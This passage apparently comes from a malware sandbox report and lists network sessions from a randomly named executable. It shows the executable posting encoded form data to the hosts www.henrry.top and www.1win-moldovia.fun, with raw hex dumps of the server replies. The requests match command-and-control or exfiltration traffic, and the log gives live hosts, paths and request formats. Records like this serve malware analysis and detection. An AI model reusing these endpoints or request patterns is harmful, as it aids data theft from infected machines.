              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 31 30 30 70 78 3b 68 65 69 67 68 74 3a 32 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 35 30 25 3b 74 6f 70 3a 35 30 25 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 35 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 32 37 62 61 61 22 3e 0a 20 20 20 20 3c [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-align:center; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; color: #027baa"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxsAAABdCAYAAADNN3slAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTM4IDc5LjE1OTgyNCwgMjAxNi8wOS8xNC0wMTowOTowMSAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9
              Sep 6, 2024 09:06:56.875149965 CEST460INData Raw: 69 5a 53 35 6a 62 32 30 76 65 47 46 77 4c 7a 45 75 4d 43 39 7a 56 48 6c 77 5a 53 39 53 5a 58 4e 76 64 58 4a 6a 5a 56 4a 6c 5a 69 4d 69 49 48 68 74 63 44 70 44 63 6d 56 68 64 47 39 79 56 47 39 76 62 44 30 69 51 57 52 76 59 6d 55 67 55 47 68 76 64
              Data Ascii: iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTcgKFdpbmRvd3MpIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOkIxN0FCNDNGRkNERjExRTZBRjU1OEZBMkJGQ0E2RjI0IiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOkIxN0FCNDQwRk
              Sep 6, 2024 09:06:56.875161886 CEST1236INData Raw: 69 4c 7a 34 67 50 43 39 79 5a 47 59 36 52 47 56 7a 59 33 4a 70 63 48 52 70 62 32 34 2b 49 44 77 76 63 6d 52 6d 4f 6c 4a 45 52 6a 34 67 50 43 39 34 4f 6e 68 74 63 47 31 6c 64 47 45 2b 49 44 77 2f 65 48 42 68 59 32 74 6c 64 43 42 6c 62 6d 51 39 49
              Data Ascii: iLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz6b3eZEAAAphklEQVR42uxdB5xeRbWfXUIoKSyk0GEXQhoYWgogSlWCNBcRH4qKgIJYqAalJiEkBvHBeyLKowg8niIooQjik6a8CLubSkghWdglQAhJSKElkJB9/7Pf3bBZNrv33jlzp53/7zd8C3zf3DszZ+
              Sep 6, 2024 09:06:56.875176907 CEST224INData Raw: 75 35 66 65 47 52 7a 51 6e 55 2b 73 62 47 7a 35 4f 77 59 7a 37 4a 4c 51 63 47 2b 68 53 37 69 6d 4d 66 37 75 43 6e 7a 74 47 38 62 70 31 62 67 70 39 4c 4d 2f 76 55 4f 62 2b 66 6f 36 31 4b 6e 65 4d 66 6e 53 78 46 4c 4c 58 79 68 79 2f 4f 30 54 46 69
              Data Ascii: u5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASEWw9m/LYD7zFUxQn2pASJpeGaAsewswOKBrl5/gnt7EjpiATqGSnmqSyyvZZWARum4gUp5hOLehiE5f3xcUpBj+tleW65FXuKO/u
              Sep 6, 2024 09:06:56.875185013 CEST1236INData Raw: 4f 51 37 51 7a 76 4d 41 39 32 70 71 47 79 44 31 75 55 49 52 37 64 58 31 4f 59 58 38 45 34 7a 76 55 6d 52 34 6b 68 37 4a 78 55 42 45 43 47 77 69 78 53 36 4c 4a 36 51 68 39 5a 4b 37 71 45 67 48 78 31 6a 6e 79 48 6a 48 64 74 70 71 65 2f 32 38 55 66
              Data Ascii: OQ7QzvMA92pqGyD1uUIR7dX1OYX8E4zvUmR4kh7JxUBECGwixS6LJ6Qh9ZK7qEgHx1jnyHjHdtpqe/28UfBD3cmAeKVbhhIgFRkr0sDqlYFkhyrxRZuwjzgDf3LGgZxV5EdIrSUoTEl8bmwTXW0Xifrc9Q1c1OX5zoPIzQ6ou5jRVV7yX43eclynGs7aWaxJmd4MCUE072v9Wmn3EwnxcSfcbK7Nnnf/khv/qgsdgVdnAmCng+f
              Sep 6, 2024 09:06:56.875211954 CEST1236INData Raw: 73 4c 4e 4a 61 64 69 6a 6d 2b 55 54 49 4d 67 39 37 78 72 64 4a 2f 76 6f 67 49 7a 32 56 4b 61 6e 4a 5a 59 73 4f 43 79 75 54 34 45 32 42 4f 78 42 77 6e 5a 49 34 44 46 38 67 4a 6c 45 4e 39 4b 75 73 6f 6c 73 4c 32 30 48 53 33 53 67 54 56 6e 31 6a 77
              Data Ascii: sLNJadijm+UTIMg97xrdJ/vogIz2VKanJZYsOCyuT4E2BOxBwnZI4DF8gJlEN9KusolsL20HS3SgTVn1jw4cFPvPzsnWasQLzviAFnVBMzyDZX1aFQtfxkoE+T3eA7npbeGbRdDURgvhjRaQlxXMo6+G+lnhgf7RtItyby+gi3ZJS2IKaogYbY2pSgXkMinTcXHFC5D7Vw4HxFH17eIhsnWY8kfJ7u0d2hj+f8nt7CQk1g1yP53
              Sep 6, 2024 09:06:56.875226021 CEST448INData Raw: 63 7a 4c 77 49 63 41 61 39 31 51 68 46 57 52 55 34 43 4e 5a 75 4f 4a 4d 43 59 54 70 5a 38 4a 72 41 68 46 64 5a 58 49 65 44 48 46 77 44 4b 6a 43 71 36 37 4c 55 59 74 55 67 2b 47 62 5a 63 4b 56 75 53 7a 58 6f 2b 31 44 4d 49 33 63 38 47 6b 63 38 43
              Data Ascii: czLwIcAa91QhFWRU4CNZuOJMCYTpZ8JrAhFdZXIeDHFwDKjCq67LUYtUg+GbZcKVuSzXo+1DMI3c8Gkc8CtWMeCXHfqWkCBwFONfj+e8Efkbvr3iyDlrhk6Js6OPrGb+/PGChmYTGhxmYAPl83wTh+epIaOhapX+rfFmrv2Nm5nK7lg9eFopqI7hQliPKbLOnZj8v4uPgom/+mJWNWqY55Sgw+praOMsZ12VIbw/3hi6uw5p8Fr
              Sep 6, 2024 09:06:56.875251055 CEST1236INData Raw: 33 43 43 2b 31 4d 67 58 6e 75 52 46 6f 61 71 74 73 51 4e 69 6b 65 68 54 62 35 6e 77 66 43 76 4b 5a 44 30 46 7a 54 59 43 62 59 56 34 6b 4e 44 57 42 6f 59 2f 52 62 66 34 39 56 73 76 47 45 75 79 46 56 30 56 76 79 4b 7a 77 6b 73 43 78 4b 31 4e 33 55
              Data Ascii: 3CC+1MgXnuRFoaqtsQNikehTb5nwfCvKZD0FzTYCbYV4kNDWBoY/Rbf49VsvGEuyFV0VvyKzwksCxK1N3U7EGttJfcmYMes3C+x+oeNwk6LKhnkEQ5SgwSvN4RzvvF+P5xMYzsDYPQxZZy9AXl9Wm1vK8kmwV+kUT11pxJ48wo2yAyG9QJR/OGEFm+tUam2VeO36Ff0huK/KiEcLCINsKB96BmCRnLvLgb6gxZ5/FxzGa3bS1an
              Sep 6, 2024 09:06:56.875262022 CEST1236INData Raw: 63 71 52 77 2b 58 75 6b 58 47 42 33 58 53 59 41 39 31 39 6e 55 42 57 75 2f 6a 51 64 37 67 77 51 38 55 72 43 75 4d 76 43 4f 78 48 64 2f 62 6e 46 38 63 39 71 52 6a 59 6f 2b 64 38 53 46 79 76 45 7a 4f 71 75 79 51 59 63 77 56 57 64 74 55 76 47 68 62
              Data Ascii: cqRw+XukXGB3XSYA919nUBWu/jQd7gwQ8UrCuMvCOxHd/bnF8c9qRjYo+d8SFyvEzOquyQYcwVWdtUvGhbXD4FvjYV5OJ6fosNqCdAqFziQPzw2kSJevP9BCJKMk+xsFwRqf4DtftoUlXBc5DtIcS2F4DCQ7PpyzRuXCA7TXAe9A7nKT5fLJq3NPRFyCckkvxaqbx9nGcrlZgvAuSv28h4dzAex6PtTvcEs3V5KAz8pDZXZSN1O
              Sep 6, 2024 09:06:56.875355005 CEST448INData Raw: 55 33 43 78 77 76 61 68 66 33 38 6a 33 7a 57 62 4a 6d 6e 37 56 78 73 4f 5a 55 6d 2b 33 59 4a 59 4a 69 36 41 46 5a 6d 7a 44 4f 76 4e 76 54 50 32 51 36 30 7a 6d 39 4d 38 51 2f 6b 35 69 4f 4d 50 6e 6f 74 31 74 36 58 77 79 70 57 78 77 58 4b 4c 56 64
              Data Ascii: U3Cxwvahf38j3zWbJmn7VxsOZUm+3YJYJi6AFZmzDOvNvTP2Q60zm9M8Q/k5iOMPnot1t6XwypWxwXKLVdCBDrMLcUwzfb5nfm+bj0kQY3hT2Vzyp6mstzasLKEph4povShxgM66OtVy8IE6EUlWebuVM3DL/SOnHJjwEYS5rOmCum8OeSdYibnSVraOONTS3aaCbetu2kN4CrsuODw3t/44EfYpNO5+puxkpffVbP5+yIY5meP
              Sep 6, 2024 09:06:56.880250931 CEST1236INData Raw: 59 75 36 61 54 38 65 6e 69 62 62 7a 2f 79 78 45 72 47 30 58 45 64 33 45 57 53 37 61 65 35 56 50 63 71 41 53 36 68 33 49 6f 4d 4c 45 5a 4b 61 65 36 62 6f 58 62 50 46 59 4e 41 6d 64 57 48 57 4c 6f 33 43 6e 7a 58 70 48 74 30 34 77 2b 41 65 78 64 57
              Data Ascii: Yu6aT8enibbz/yxErG0XEd3EWS7ae5VPcqAS6h3IoMLEZKae6boXbPFYNAmdWHWLo3CnzXpHt04w+AexdW4HVxIy5LswOggLgc8HaTBkPkyxeHAVG81g1OM+nPo7uDZqTqZ19CXP3NGWQwp/VzGP4Fvr9d/T/gqHxZb5gwPtw1vWxjSIuWEJI4LEBYtkQuLIZglI2+lVW9U6UDV3ksWpQ0cgPVMmPm0vZ4MYzquRHGju2svRcLl


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.649758121.199.37.19805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:02.758654118 CEST785OUTPOST /uq6q/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.henrry.top
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.henrry.top
              Referer: http://www.henrry.top/uq6q/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 77 4d 46 47 39 43 59 54 6a 6a 47 2b 5a 63 68 5a 51 53 4f 51 76 36 32 48 4b 56 58 62 4d 70 59 49 4a 58 4e 36 47 68 31 32 78 76 32 54 50 7a 43 69 42 6d 59 76 71 59 7a 6d 4c 48 54 69 62 78 7a 2b 70 6b 78 33 35 62 38 49 79 59 54 36 77 4d 44 7a 37 78 78 71 36 37 33 35 36 59 66 6a 62 36 79 42 71 37 43 66 56 51 54 45 52 45 57 6b 71 4c 32 64 37 6b 79 72 44 73 31 65 37 31 59 4c 6e 46 39 48 5a 7a 4c 5a 2b 49 4d 33 6b 63 45 34 6a 4f 5a 45 45 4a 54 31 54 6c 43 52 75 6c 62 50 74 51 57 75 42 68 35 63 70 76 73 37 68 6b 4a 6d 2b 7a 54 48 2b 4c 46 30 56 50 4a 79 6a 73 65 38 70 51 6f 57 64 35 71 75 2f 39 45 36 36 63 4b 4a
              Data Ascii: FR=wMFG9CYTjjG+ZchZQSOQv62HKVXbMpYIJXN6Gh12xv2TPzCiBmYvqYzmLHTibxz+pkx35b8IyYT6wMDz7xxq67356Yfjb6yBq7CfVQTEREWkqL2d7kyrDs1e71YLnF9HZzLZ+IM3kcE4jOZEEJT1TlCRulbPtQWuBh5cpvs7hkJm+zTH+LF0VPJyjse8pQoWd5qu/9E66cKJ


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.649759121.199.37.19805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:05.315206051 CEST809OUTPOST /uq6q/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.henrry.top
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.henrry.top
              Referer: http://www.henrry.top/uq6q/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 77 4d 46 47 39 43 59 54 6a 6a 47 2b 62 2f 35 5a 57 78 57 51 2b 4b 33 31 47 31 58 62 47 4a 59 4d 4a 57 78 36 47 67 42 6d 77 64 53 54 4f 52 61 69 41 6e 59 76 72 59 7a 6d 65 33 53 70 45 42 7a 50 70 6b 74 2f 35 61 41 49 79 59 58 36 77 4f 62 7a 37 43 5a 72 37 72 33 37 32 34 66 39 56 61 79 42 71 37 43 66 56 52 6a 69 52 45 75 6b 71 37 47 64 70 78 47 6f 66 38 31 5a 2b 46 59 4c 71 6c 38 4f 5a 7a 4c 76 2b 4d 4e 61 6b 65 4d 34 6a 50 70 45 45 63 6e 32 64 56 43 58 68 46 61 64 38 78 58 46 47 7a 38 4b 76 63 45 5a 2b 6e 52 4b 79 6c 53 64 69 34 46 58 48 66 70 77 6a 75 47 4f 70 77 6f 38 66 35 53 75 74 71 49 64 31 6f 76 71 61 78 33 61 5a 30 4c 65 55 77 2f 4d 6f 76 54 2b 78 2f 48 51 6f 67 3d 3d
              Data Ascii: FR=wMFG9CYTjjG+b/5ZWxWQ+K31G1XbGJYMJWx6GgBmwdSTORaiAnYvrYzme3SpEBzPpkt/5aAIyYX6wObz7CZr7r3724f9VayBq7CfVRjiREukq7GdpxGof81Z+FYLql8OZzLv+MNakeM4jPpEEcn2dVCXhFad8xXFGz8KvcEZ+nRKylSdi4FXHfpwjuGOpwo8f5SutqId1ovqax3aZ0LeUw/MovT+x/HQog==
              Sep 6, 2024 09:07:06.426810980 CEST94INHTTP/1.1 200 OK
              Date: Fri, 06 Sep 2024 07:07:06 GMT
              Content-Length: 0
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.649760121.199.37.19805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:07.855396986 CEST1822OUTPOST /uq6q/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.henrry.top
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.henrry.top
              Referer: http://www.henrry.top/uq6q/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 77 4d 46 47 39 43 59 54 6a 6a 47 2b 62 2f 35 5a 57 78 57 51 2b 4b 33 31 47 31 58 62 47 4a 59 4d 4a 57 78 36 47 67 42 6d 77 64 61 54 50 69 53 69 42 45 41 76 35 49 7a 6d 43 6e 53 71 45 42 7a 6f 70 6b 6c 37 35 61 4d 2b 79 61 66 36 78 74 54 7a 39 7a 5a 72 78 72 33 37 72 6f 66 67 62 36 79 51 71 37 79 54 56 51 66 69 52 45 75 6b 71 35 65 64 71 6b 79 6f 64 38 31 65 37 31 5a 5a 6e 46 39 6e 5a 31 6a 52 2b 4d 41 6e 6e 76 73 34 6a 76 35 45 4a 4f 2f 32 62 46 43 56 6d 46 62 59 38 30 50 61 47 79 51 4f 76 64 77 2f 2b 6c 4e 4b 78 78 62 73 36 4a 6b 4c 51 38 46 47 34 64 7a 31 78 33 6b 37 57 34 6a 66 2b 35 4d 54 2f 73 33 37 55 45 37 61 4e 46 65 64 57 79 4c 53 70 4a 32 41 38 50 43 44 72 4b 38 45 68 2b 30 44 69 6c 61 67 73 39 68 78 79 66 58 67 7a 45 61 30 67 71 7a 4c 36 4f 66 39 51 34 33 76 4e 54 61 4a 4e 36 34 47 57 50 78 76 4c 56 66 75 77 6c 2f 38 4b 46 68 6c 45 77 58 6c 41 6e 34 54 77 49 42 52 30 67 55 31 52 68 61 76 76 52 7a 41 50 77 54 50 2b 4a 45 72 4f 46 52 74 65 46 77 57 76 69 7a 78 6c 50 37 78 52 67 51 [TRUNCATED]
              Data Ascii: FR=wMFG9CYTjjG+b/5ZWxWQ+K31G1XbGJYMJWx6GgBmwdaTPiSiBEAv5IzmCnSqEBzopkl75aM+yaf6xtTz9zZrxr37rofgb6yQq7yTVQfiREukq5edqkyod81e71ZZnF9nZ1jR+MAnnvs4jv5EJO/2bFCVmFbY80PaGyQOvdw/+lNKxxbs6JkLQ8FG4dz1x3k7W4jf+5MT/s37UE7aNFedWyLSpJ2A8PCDrK8Eh+0Dilags9hxyfXgzEa0gqzL6Of9Q43vNTaJN64GWPxvLVfuwl/8KFhlEwXlAn4TwIBR0gU1RhavvRzAPwTP+JErOFRteFwWvizxlP7xRgQ7WkY8NkCZ8VdAbcBb+775Np5ZrNRqv352QnP7Sy3O7iYgD5+t10Id8hZj8q14LEHQglUBtLkQjXfORAwP2J2+J60XziRnkEE941+/9bTqHs4wobvGFnUNHt9h/6E8VO7L/riQaaKDbTXdOWiKuNoKnMVcDc0qkn2teZgB2VCNrjZgW8N94RUznyMBUqbDDjdeSuZnSDmQSIBb52J6Klba8v0kbEg8ghp0lvZxFH1HFk+hUyaBpfkHIjKeyCEg5UoG14GQpoeVjEyBHkKGZfEJam7LOxCMKDWMISwMO+AXjIp9rtzJ9AV38bg/qUjtrZQI7wj2pS5mAdVuK8vXGdP1/4jyD8WEdmN1KbmaX+dfytJwba3eIIrT8h2+ClFNSkEue1Yfh25m7oGGzi28y46nB/fa6QNR8po5gguDowv9LWoGqeUDyJFleomkTqaFepHrjDsnvrD46myoLn3tVgnjwf64B4rFNc1GVuUbEEftvUtREnd0IN3ZT0YH8V4rwerdRrQxS7J0gk6mrI7O/YT9vtb7/AaxMCR64nqvYKBotuJ+zKTUuDIzusdDf5zBnv5IXPnUyy1dF/zEtN5AjKLObnQ2hzatIeBoECKII9kwy6TRf8eM49SFFKQnFXmlNmfbU4g2R/6jyT0ZRwJK9lzweoe6jNMEoc/vO [TRUNCATED]
              Sep 6, 2024 09:07:09.026575089 CEST94INHTTP/1.1 200 OK
              Date: Fri, 06 Sep 2024 07:07:08 GMT
              Content-Length: 0
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.649761121.199.37.19805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:10.396234035 CEST528OUTGET /uq6q/?FR=9Otm+20UpUikA6x0VD212tqxG3jyIPcWfHFyJTdbxKGeDxDVLjdT/4jyPXypOz+d9yZQrKELvtj6jM/m3RUo26f0zJnEKMWuurbJZWWdFjqlgtWZigu2A/olrWAWySRFQjrMuco=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.henrry.top
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:11.579998016 CEST94INHTTP/1.1 200 OK
              Date: Fri, 06 Sep 2024 07:07:11 GMT
              Content-Length: 0
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.649762188.114.96.3805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:16.949395895 CEST806OUTPOST /4jz5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.1win-moldovia.fun
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.1win-moldovia.fun
              Referer: http://www.1win-moldovia.fun/4jz5/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 6d 37 36 49 54 67 33 52 4a 6d 72 4b 4f 50 4d 54 43 41 53 48 62 4d 68 37 55 73 75 4d 74 43 34 33 4a 45 58 49 76 4e 38 39 34 30 38 38 75 54 31 71 6f 39 2f 44 62 4b 65 61 48 41 65 44 4e 77 68 62 4e 73 2b 75 6b 44 77 30 33 72 50 55 39 46 77 42 65 2f 43 76 45 6a 48 70 5a 55 70 46 5a 6a 55 50 6e 2f 71 57 75 51 79 4c 4a 39 68 39 68 6c 39 52 46 4a 70 32 64 30 44 51 66 32 68 44 75 5a 56 36 4c 67 50 31 6a 5a 77 66 78 7a 6b 57 57 46 31 68 49 42 68 65 39 53 4f 4a 6d 76 74 6e 53 50 39 4f 5a 7a 38 7a 56 56 71 44 6a 44 48 34 6d 31 4b 4e 63 66 7a 77 67 49 66 79 38 38 64 70 73 37 76 79 61 52 44 32 41 2f 51 50 2b 4f 2f 57
              Data Ascii: FR=m76ITg3RJmrKOPMTCASHbMh7UsuMtC43JEXIvN894088uT1qo9/DbKeaHAeDNwhbNs+ukDw03rPU9FwBe/CvEjHpZUpFZjUPn/qWuQyLJ9h9hl9RFJp2d0DQf2hDuZV6LgP1jZwfxzkWWF1hIBhe9SOJmvtnSP9OZz8zVVqDjDH4m1KNcfzwgIfy88dps7vyaRD2A/QP+O/W
              Sep 6, 2024 09:07:17.619527102 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:17 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1x2%2BpCmcGTg2AG9xhsfwb193NvJ2wC45Dhc0HPu73UdNHzQpMhmpOnY5pvxy3y1U66GANiXpCYFFdKh%2BxwE0oNu8%2BCSvm0HMWTlB%2BpGB73UvKJNDMu%2F0lV6w6pv7%2FZJInOnqB8Dzog%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f097d937c6c-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              Data Raw: 31 62 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 5c 5b 6f 23 37 96 7e 0f 90 ff c0 11 b0 c8 2e b6 aa ac 2a 49 96 d4 b1 bd 70 dc c9 a4 07 ee c4 9b ee 49 76 b0 18 18 14 8b 92 d8 cd 22 6b 58 a4 da ed bd bc f8 7d de b3 fd 96 97 7d 9b 3f d1 7e f0 cf 5a 9c 43 d6 45 17 5f da e9 0e 06 0b a4 63 a9 2e a7 58 e4 b9 7c e7 9c 8f 3a f8 97 72 59 7e fe d9 92 d3 9c 9b 7f fc e2 db 97 2f cf f6 d2 24 25 c3 fe 90 7c a7 2d f9 46 3b 95 7f f1 4f 5f 7e fe d9 bf 1c 7d fe d9 e7 9f 1d fc ee e9 f7 27 2f ff 74 f6 35 59 da 42 1e 7d fe d9 01 fc 25 92 aa c5 61 cf e8 f8 f9 d3 de d1 e7 9f 11 42 0e 40 a4 ff 08 df 0a 6e 29 59 5a 5b c6 fc 2f 4e ac 0e 7b 27 5a 59 ae 6c fc f2 6d c9 7b 84 f9 6f 87 3d cb 2f ec 1e 88 fc 92 b0 25 35 15 b7 87 7f 7c f9 4d 3c e9 6d 88 52 b4 e0 87 bd 95 e0 6f 4a 6d 6c 47 c0 1b 91 db e5 61 ce 57 82 f1 18 bf 44 44 28 61 05 95 71 c5 a8 e4 87 69 47 96 15 56 f2 a3 f4 27 a1 c8 7f 92 63 c6 78 45 6f de 09 52 09 cb 63 27 89 9e 0b 26 a8 24 54 92 52 52 3b d7 a6 e0 82 e4 9c bc d2 cc 19 41 d2 9f 9e 7d 37 e3 f6 60 cf cb 69 c4 [TRUNCATED]
              Data Ascii: 1b3a\[o#7~.*IpIv"kX}}?~ZCE_c.X|:rY~/$%|-F;O_~}'/t5YB}%aB@n)YZ[/N{'ZYlm{o=/%5|M<mRoJmlGaWDD(aqiGV'cxEoRc'&$TRR;A}7`iJ^a4i8=4|~IUz!9-E0]%ftUi#B6=VU/'Ts{xUj.b<\5boNWp0) {p`jeJM+fDii40F2wZQIn~2+k/KaS/De5<bWo]aV?y.f8q;\CP+Vzo"-f';6oML:b6pepe
              Sep 6, 2024 09:07:17.619558096 CEST1236INData Raw: b5 5a 10 b0 f5 af f4 c5 61 af 4f fa 64 3a ee 93 e1 74 d0 23 17 85 7c 52 95 94 71 34 93 8a 9b 15 c7 83 aa f2 56 f2 64 6f ef cd 9b 37 c9 9b 41 a2 cd 62 2f eb f7 fb 7b d5 6a d1 ab c7 f9 62 b5 38 d5 0b 7d 5e 85 bf f6 4f 2f 67 67 f7 8c 06 06 64 38 b3
              Data Ascii: ZaOd:t#|Rq4Vdo7Ab/{jb8}^O/ggd8=mkgPR$ay6EY q2dgddi?Igx`dqi6HQ:1|'8K,`~2[6HxLI<Hef82edMi
              Sep 6, 2024 09:07:17.619573116 CEST448INData Raw: 7e 5c ff b7 8c 07 19 c3 e3 a4 1f a7 fb 24 9c 24 e9 fe 2a 1d 0e bf 4d f7 6f 39 39 c8 58 9f e0 19 38 48 ea ff 96 e9 70 08 37 ee 3e 39 c8 98 17 46 52 4c 30 e0 60 9c ee ff 98 4d 26 70 e3 ce 93 2b 18 e0 ae 91 5f 7e ac 60 77 8f 5e bc ff 6b 27 f5 be d5
              Data Ascii: ~\$$*Mo99X8Hp7>9FRL0`M&p+_~`w^k'>wwN>'dVsH4o:[o+h|]&R,/K\[::jq/W$Pp=*R-8$WP-J@RR#97BD-fq}b
